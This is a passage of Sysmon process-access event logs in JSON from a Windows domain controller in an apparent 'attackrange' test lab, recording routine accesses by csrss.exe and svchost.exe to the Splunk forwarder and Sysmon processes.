{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5667,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0332-5F25-0000-001061C20A00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0332-5F25-0000-001061C20A00}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:50.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:50.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 